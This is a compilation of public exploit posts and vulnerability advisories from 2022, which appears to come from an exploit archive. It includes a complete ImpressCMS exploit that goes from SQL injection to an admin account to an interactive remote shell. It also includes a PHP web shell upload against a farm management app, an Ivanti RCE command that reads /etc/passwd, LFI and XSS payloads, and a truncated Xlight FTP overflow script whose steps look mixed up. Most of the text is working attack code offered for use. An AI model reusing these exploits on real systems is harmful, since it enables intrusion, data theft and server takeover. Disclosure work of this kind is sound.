<pre><code># Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)<br /># Date: 2022-03-22<br /># Author: Milad karimi<br /># Software Link: https://www.drupal.org/project/avatar_uploader<br /># Version: v7.x-1.0-beta8<br /># Tested on: Windows 10<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated<br /># Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/<br /># Date: 23-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/<br /># Version: 3.7.3<br /># Tested on: Firefox<br /><br /># Vulnerable File: dispatcher.php<br /><br /># Vulnerable Code:<br /><br />```<br />if ( isset($_GET['open']) ) {<br /> include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);<br />} else {<br /> echo '<br /> <div id="welcome-panel" class="welcome-panel"<br />style="padding-bottom: 20px;"><br /> <div class="welcome-panel-column-container">';<br /><br /> include_once( ABSPATH . WPINC . '/feed.php' );<br />```<br /><br /># Proof of Concept:<br /><br />localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]<br /><br /></code></pre>
<pre><code><?php<br /><br />/*<br /> ----------------------------------------------------------<br /> ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution<br /> ----------------------------------------------------------<br /> <br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://www.impresscms.org<br /> <br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /> <br /> [-] Vulnerability Description:<br /> <br /> User input passed through the "groups" POST parameter to the /include/findusers.php script is not<br /> properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and<br /> icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to<br /> construct a SQL query without proper validation, and this can be exploited by remote attackers<br /> to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection<br /> attacks. The application uses PDO as a database driver, which allows for stacked SQL queries,<br /> as such this vulnerability could be exploited to e.g. create a new admin user and execute<br /> arbitrary PHP code.<br /> <br /> [-] CVE Reference:<br /><br /> The Common Vulnerabilities and Exposures project (cve.mitre.org)<br /> has assigned the name CVE-2021-26599 to this vulnerability.<br /><br /> [-] Disclosure timeline:<br /> <br /> [19/01/2021] - Vendor notified through HackerOne<br /> [29/01/2021] - Vulnerability acknowledged by the vendor<br /> [03/02/2021] - CVE number assigned<br /> [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed<br /> [11/02/2022] - Vendor was informed about the ineffective fix<br /> [09/03/2022] - Version 1.4.4 released<br /> [22/03/2022] - Public disclosure<br /> <br /> [-] Technical writeup:<br /><br /> http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />function hex_enc($input)<br />{<br /> for ($i = 0; $i < strlen($input); $i++)<br /> $encoded .= sprintf("%02x", ord($input[$i]));<br /> return "0x{$encoded}";<br />}<br /><br />print "+-----------------------------------------------------------+\n";<br />print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n";<br />print "+-----------------------------------------------------------+\n";<br /><br />if ($argc != 2)<br />{<br /> print "\nUsage: php $argv[0] <URL>";<br /> print "\nExample.: php $argv[0] http://localhost/impresscms/";<br /> print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";<br /> die();<br />}<br /><br />$url = $argv[1];<br />$ch = curl_init();<br /><br />curl_setopt($ch, CURLOPT_HEADER, true);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /><br />print "\n[+] Retrieving security token (CVE-2021-26598)\n"; <br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");<br /><br />$res = curl_exec($ch);<br /><br />if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n");<br />if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n");<br /><br />print "[+] Starting SQL Injection attack (CVE-2021-26599)\n";<br />print "[*] Step 1: retrieving database name\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php");<br />curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]);<br /><br />$params = "user_submit=1&token={$token[1]}&groups[]=%s";<br /><br />$min = true;<br />$idx = 1;<br /><br />while(1)<br />{<br /> $test = 256;<br /><br /> for ($i = 7; $i >= 0; $i--)<br /> {<br /> $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));<br /> $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#";<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));<br /> $min = !preg_match("/No Users Found/", curl_exec($ch));<br /> }<br /><br /> if (($chr = $min ? ($test - 1) : ($test)) == 0) break;<br /> $dbname .= chr($chr); $min = true; $idx++;<br /> print "\r[+] DB name: {$dbname}";<br />}<br /><br />print "\n[*] Step 2: retrieving tables prefix\n";<br /><br />$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'";<br />$min = true;<br />$idx = 1;<br /><br />while(1)<br />{<br /> $test = 256;<br /><br /> for ($i = 7; $i >= 0; $i--)<br /> {<br /> $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));<br /> $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))");<br /> $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#";<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));<br /> $start = time(); curl_exec($ch); $secs = time() - $start;<br /> $min = ($secs < 2);<br /> }<br /><br /> if (($chr = $min ? ($test - 1) : ($test)) == 0) break;<br /> $prefix .= chr($chr); $min = true; $idx++;<br /> print "\r[+] Prefix: {$prefix}";<br />}<br /><br />print "\n[*] Step 3: creating new admin user\n";<br /><br />$uid = time();<br />$enc = hex_enc("egix");<br />$pwd = hex_enc(md5("egix"));<br />$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#";<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));<br />curl_exec($ch);<br /><br />$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#";<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));<br />curl_exec($ch);<br /><br />print "[+] Trying to login as the new user\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}user.php");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login");<br /><br />if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n");<br /><br />print "[+] Creating malicious autotask\n";<br /><br />$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }");<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php");<br />curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks");<br /><br />if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n");<br /><br />print "[+] Launching shell\n";<br /><br />curl_setopt($ch, CURLOPT_URL, $url);<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />while(1)<br />{<br /> print "\nimpresscms-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);<br /> preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");<br />}<br /><br /></code></pre>
<pre><code><br />ICT Protege GX/WX 2.08 Client-Side SHA1 Password Hash Disclosure<br /><br /><br />Vendor: Integrated Control Technology Ltd.<br />Product web page: https://www.ict.co<br />Affected version: GX: Ver: 2.08.1002 K1B3<br /> Lib: 04.00.217<br /> Int: 2.3.235.J013<br /> OS: 2.0.20<br /> WX: Ver: 4.00 284 H062<br /> App: 02.08.766<br /> Lib: 04.00.169<br /> Int: 02.2.208<br /><br />Summary: Protege GX is an enterprise level integrated access control, intrusion<br />detection and building automation solution with a feature set that is easy to<br />operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,<br />web-based, cross-platform system that gives you a fully functional access control<br />and intrusion detection solution in a fraction of the time of conventional software.<br />With no software to install, setup is quick and simple. Connect the Controller and<br />system components, then open a web browser to launch the intuitive wizard-driven<br />interface which guides you through the process of configuring your system.<br /><br />Desc: The application is vulnerable to improper access control that allows an<br />authenticated operator to disclose SHA1 password hashes (client-side) of other<br />users/operators.<br /><br />Tested on: Microsoft-WinCE/6.00<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5700<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php<br /><br /><br />08.02.2022<br /><br />--<br /><br /><br />Navigate to http://CONTROLLER_IP/operator.htm<br /><br />Source:<br /><br /><p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p><br />...<br />...<br /><input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc"><br />...<br /></code></pre>
<pre><code><br />ICT Protege GX/WX 2.08 Authenticated Stored XSS Vulnerability<br /><br /><br />Vendor: Integrated Control Technology Ltd.<br />Product web page: https://www.ict.co<br />Affected version: GX: Ver: 2.08.1002 K1B3<br /> Lib: 04.00.217<br /> Int: 2.3.235.J013<br /> OS: 2.0.20<br /> WX: Ver: 4.00 284 H062<br /> App: 02.08.766<br /> Lib: 04.00.169<br /> Int: 02.2.208<br /><br />Summary: Protege GX is an enterprise level integrated access control, intrusion<br />detection and building automation solution with a feature set that is easy to<br />operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,<br />web-based, cross-platform system that gives you a fully functional access control<br />and intrusion detection solution in a fraction of the time of conventional software.<br />With no software to install, setup is quick and simple. Connect the Controller and<br />system components, then open a web browser to launch the intuitive wizard-driven<br />interface which guides you through the process of configuring your system.<br /><br />Desc: The application suffers from an authenticated stored XSS vulnerability.<br />The issue is triggered when input passed to the 'Name' parameter is not properly<br />sanitized before being returned to the user. This can be exploited to execute<br />arbitrary HTML and script code in a user's browser session in context of an<br />affected site.<br /><br />Tested on: Microsoft-WinCE/6.00<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5699<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php<br /><br /><br />08.02.2022<br /><br />--<br /><br /><br />UI navigation:<br />--------------<br /><br />Scheduling > Daylight Savings > (Name field).<br /><br /><br />Decrypted POST request:<br />-----------------------<br /><br />POST /daylightsaving.htm<br /><br />Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1<br /><br /><br />Encrypted GET request:<br />----------------------<br /><br />http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6<br /><br /><br />Additional info:<br />----------------<br /><br />Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak<br />The D3037E8A is the serial number of the onboard reader.<br /><br />Encrypt/Decrypt functions:<br />--------------------------<br /><br />From console:<br />> localStorage.getItem("WXKey")<br />< '8EDB22D9FB767538'<br /><br />function encryptAES(a, c) {<br /> a = a.toString();<br /> a = unescape(encodeURIComponent(a));<br /> "undefined" == typeof c && (c = !0);<br /> if (0 == servertype)<br /> return a;<br /> var b = localStorage.getItem("WXKey");<br /> if ("" == b || null == b)<br /> return a;<br /> for (var d = "", e = 0; 16 > e; e++)<br /> d += String.fromCharCode(Math.floor(75 * Math.random() + 48));<br /> a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");<br /> return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)<br />}<br /><br />function decryptAES(a) {<br /> if (null == a)<br /> return "";<br /> a = a.toString();<br /> if ("<invalid session> < Packet not Init and not encrypted. >" == a)<br /> a = 0 == servertype ? "login.php" : "login.htm",<br /> window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();<br /> else if ("<invalid session>" == a.substr(0, 17))<br /> a = 0 == servertype ? "login.php?logout" : "login.htm?logout",<br /> window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();<br /> else {<br /> if (0 == servertype)<br /> return a;<br /> var c = localStorage.getItem("WXKey");<br /> if ("" == c)<br /> return a;<br /> a = hexToStr(a);<br /> var b = a.substr(0, 16);<br /> a = a.substr(16, a.length);<br /> a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");<br /> a = removePKCS7(a);<br /> return a = decodeURIComponent(escape(a))<br /> }<br /></code></pre>
<pre><code>Product: OX App Suite<br />Vendor: OX Software GmbH<br /><br /><br /><br />Internal reference: OXUIB-1092<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev26<br />Vendor notification: 2021-11-15<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44208<br />CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />System messages at the OX Chat component are escaped to avoid injection of malicious code. However, this check is not performed for messages that are "unknown" to the system. Such messages do not occur during normal operations.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink or compromise of chat components.<br /><br />Steps to reproduce:<br />1. Maliciously modify the chat infrastructure to inject "unknown" messages that contain script code<br />2. Make the victim connect to that infrastructure and request messages for their account<br /><br />Solution:<br />We now sanitize "unknown" system messages, in case this scenario may ever happen in the wild.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1322<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-11-12<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44209<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Specific HTML5 tags and some attributes were not sufficiently considered when detecting malicious code thats being served as download.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Upload a HTML5 document with specific tags, set a HTML file extension but a misleading media-type<br />2. Share the file and make a victim click a hyperlink to that resource<br /><br />Proof of concept:<br /><audio src="/appsuite/apps/themes/default/sounds/bell.ogg" onprogress="alert('XSS');" onsuspend="alert('XSS');" controls></audio><br /><br />Solution:<br />We improved HTML detection and examine a complete list of tags, attributes and event handlers.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1260<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-09-27<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44210<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Certain media formats (NIFF) in this case, were not detected to contain potentially harmful content. This can be exploited by an attacker by uploading malicious content in disguise. Some browsers will attempt to render NIFF sources as inline content.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Generate malicious JS/HTML content and upload it as NIFF image, change the media-type accordingly<br />2. Share that malicious code using "sharing"<br />3. Make a victim follow a link to the malicious share<br /><br />Solution:<br />We now detect NIFF as potentially malicious content and force browsers to download it.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1259<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-09-27<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44211<br />CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML E-Mail signatures are processed by a sanitizer. This sanitizer can be tricked to generate malicious output by injecting seemingly benign garbled HTML code.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require some level of access to the victims account, context and pull off a social engineering attack.<br /><br />Steps to reproduce:<br />1. Create a malicious E-Mail signature<br />2. Share and make a victim select that E-Mail signature<br /><br />Proof of concept:<br /><img src class="src=cid:asd onerror=alert('XSS')//"><br /><br />Solution:<br />We now check the HTML "class" attribute for potential malicious content for HTML E-Mail signatures.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1219<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-08-17<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44212<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Script tags at HTML content can be obfuscated by using trailing control commands to bypass existing sanitizers.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Create malicious script code and obfuscate HTML tags using control characters<br />2. Share the malicious code and make a victim click a link that points to this code<br /><br />Proof of concept:<br /><script\t>alert("XSS");</script\t><br /><br />Solution:<br />We now improve detection of obfuscated HTML tags.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1216<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-08-13<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44213<br />CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Binary uu-encoded content at multipart/alternative E-Mails is processed as mail body without sanitization in certain cases.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this the victim needs to interact with the message.<br /><br />Steps to reproduce:<br />1. Generate a malicious mail with binary unix-to-unix content and a specific header structure, add placeholder content to trigger the "Show entire message" feature<br />2. Send that E-Mail to the victim<br />3. As the victim, select the message and follow the "Show entire content" link<br /><br />Proof of concept:<br />?/'-C<FEP=#YA;&5R="@B6%-3(BD[/"]S8W)I<'0^"@`` becomes <script>alert("XSS");</script><br /><br />Solution:<br />We now advertise uu-encoded E-Mail parts as file attachment rather than the mail body.<br /></code></pre>
<pre><code># Title: Poultry Farm Management System 1.0 Remote Code Execution (RCE)<br /># Author: Hejap Zairy<br /># Date: 20.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload profile files<br /><br />```php<br />if(isset($_POST['submit']))<br />{<br /> $adminid=$_SESSION['odmsaid'];<br /> $productname=$_POST['productName'];<br /> $productimage1=$_FILES["productimage1"]["name"];<br /> move_uploaded_file($_FILES["productimage1"]["tmp_name"],"profileimages/".$_FILES["productimage1"]["name"]);<br /> $sql="update tbladmin set Photo=:productimage1 where ID=:aid";<br /> $query = $dbh->prepare($sql);<br /> $query->bindParam(':productimage1',$productimage1,PDO::PARAM_STR);<br /> $query->bindParam(':aid',$pid,PDO::PARAM_STR);<br /> $query->execute();<br /> $_SESSION['msg']="profile Image Updated Successfully !!";<br /> }<br /> ?><br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /Redcock-Farm/farm/update_image.php?id=2 HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/Redcock-Farm/farm/update_image.php?id=2<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /Redcock-Farm/farm/profileimages/0day_hejap.php?515=echo%200day%20hejap%20Zairy HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Sun, 20 Mar 2022 08:04:28 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 17<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0day hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/uZfnU3c.png<br /></code></pre>
<pre><code># Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution) <br /># Date: 20/03/2022 <br /># Exploit Author: d7x <br /># Vendor Homepage: https://www.ivanti.com/ <br /># Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 <br /># Version: CSA 4.6 4.5 - EOF Aug 2021 <br /># Tested on: Linux x86_64 # CVE : CVE-2021-44529<br /># CVE : CVE-2021-44529<br /><br />###<br />This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): <br />https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US<br /><br />Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies<br /><br />@d7x_real<br />https://d7x.promiselabs.net<br />https://www.promiselabs.net<br />###<br /><br /># cat /etc/passwd<br />curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo<br /><br /># sleep for 10 seconds<br />curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo <br /><br /></code></pre>
<pre><code># Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP)<br /># Exploit Author: Hejap Zairy<br /># Date: 13.07.2022<br /># Software Link: http://www.xlightftpd.com/download/setup.exe<br /># Tested Version: v3.9.3.2(2022-1-5) <br /># Tested on: Windows 10 64bit<br /><br /># 1.- Run python code : 0day-Hejap_Zairy.py<br /># 2.- Open 0day_Hejap.txt and copy All content to Clipboard<br /># 3.- Open Audio Conversion Wizard and press Enter Code<br /># 5.- Click 'Server ip ' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in ' -> 'Setup'<br /># 6.- Crashed<br /><br /><br /># Author Code By Hejap Zairy<br />#!/usr/bin/env python<br /># Auther Hejap Zairy <br />#!/usr/bin/env python<br />import struct<br /><br /><br />##================================================================================<br />## 2022-03-12 16:54:06<br />##================================================================================<br />##-----------------------------------------------------------------------------------------------------------------------------------------<br />## Module info :<br />##-----------------------------------------------------------------------------------------------------------------------------------------<br />## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path<br />##-----------------------------------------------------------------------------------------------------------------------------------------<br />## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll)<br />## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:\Windows\System32\ucrtbase.dll)<br />## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:\Windows\System32\profapi.dll)<br />## 0x76340000 | 0x763c0000 | 0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:\Windows\System32\msvcp_win.dll)<br />## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:\Windows\System32\gdi32full.dll)<br />## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll)<br />## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:\Windows\System32\kernel.appcore.dll)<br />## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] 